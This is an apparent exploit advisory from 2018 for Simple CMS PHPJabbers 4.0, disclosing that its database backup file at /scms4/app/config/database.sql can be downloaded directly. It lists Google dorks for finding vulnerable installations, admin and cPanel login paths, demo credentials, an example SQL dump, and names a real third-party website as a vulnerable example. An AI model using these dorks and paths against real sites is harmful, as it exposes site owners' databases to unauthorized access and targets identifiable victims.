· 7 years ago · Dec 16, 2018, 11:52 PM
1#################################################################################################
2
3# Exploit Title : Simple CMS PHPJabbers Stivasoft 4.0 Database Backup Disclosure
4# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
5# Date : 17/12/2018
6# Vendor Homepage : phpjabbers.com ~ stivasoft.com ~ racingriverwebs.com
7# Software Download Link : phpjabbers.com/simple-cms/
8# Demo Software : demo.phpjabbers.com/1544995520_332/index.php?controller=pjAdminSections&action=pjActionIndex
9+ Login Details => Email: admin@admin.com Password: pass
10# Tested On : Windows and Linux
11# Category : WebApps
12# Version Information : 4.0
13# Exploit Risk : Medium
14# Google Dorks : intext:''PHP Scripts Copyright © 2018 StivaSoft Ltd''
15+ intext:''Hotel Booking script by PHPJabbers.com -
16+ intext:''© Copyright Dravis Interests 2003-2018 Website by Racing River Website Solutions''
17+ intext:''Website by Racing River Website Solutions''
18# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
19CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
20CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
21
22#################################################################################################
23
24# Admin Panel Login Path :
25
26/scms4/index.php?controller=Admin&action=login
27
28# CPanel Login Path :
29
30p3plcpnl0800.prod.phx3.secureserver.net:2083
31
32# Exploit :
33
34/scms4/app/config/database.sql
35
36#################################################################################################
37
38# Example SQL Dump Information => dravisinterests.com
39
40DROP TABLE IF EXISTS `simple_cms_files`;
41CREATE TABLE IF NOT EXISTS `simple_cms_files` (
42
43DROP TABLE IF EXISTS `simple_cms_roles`;
44CREATE TABLE IF NOT EXISTS `simple_cms_roles` (
45
46DROP TABLE IF EXISTS `simple_cms_sections`;
47CREATE TABLE IF NOT EXISTS `simple_cms_sections` (
48
49DROP TABLE IF EXISTS `simple_cms_users`;
50CREATE TABLE IF NOT EXISTS `simple_cms_users` (
51
52DROP TABLE IF EXISTS `simple_cms_users_files`;
53CREATE TABLE IF NOT EXISTS `simple_cms_users_files` (
54
55DROP TABLE IF EXISTS `simple_cms_users_sections`;
56CREATE TABLE IF NOT EXISTS `simple_cms_users_sections` (
57
58DROP TABLE IF EXISTS `simple_cms_options`;
59CREATE TABLE IF NOT EXISTS `simple_cms_options` (
60
61INSERT INTO `simple_cms_roles` (`id`, `role`, `status`) VALUES
62(1, 'admin', 'T'),
63(2, 'editor', 'T');
64
65#################################################################################################
66
67# Example Vulnerable Site =>
68
69[+] dravisinterests.com/scms4/app/config/database.sql => [ Proof of Concept for Vuln ] => archive.is/43J4N
70
71#################################################################################################
72
73# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
74
75#################################################################################################